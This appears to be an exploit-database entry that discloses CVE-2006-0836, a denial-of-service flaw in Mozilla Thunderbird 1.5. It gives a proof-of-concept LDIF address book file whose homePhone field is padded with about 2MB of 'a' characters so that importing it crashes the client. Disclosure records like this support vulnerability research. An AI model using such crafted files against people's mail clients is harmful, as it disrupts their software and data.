
Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service

Author: DrFrancky
type: dos
platform: linux
date_added: 2006-02-17 
date_updated: 2013-08-02 
verified: 1 
codes: CVE-2006-0836;OSVDB-23488 

source: https://www.securityfocus.com/bid/16716/info

Mozilla Thunderbird is prone to a remote denial-of-service vulnerability.

The issue presents itself when the application handles a specially crafted address book file.

Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.

PoC: create a file named file.ldif with the following contents, then import it into the address book:
dn: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@securax.org
cn: POC by DrFrancky@securax.org
mozillaNickname: DrFrancky
mail: drfrancky@securax.org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']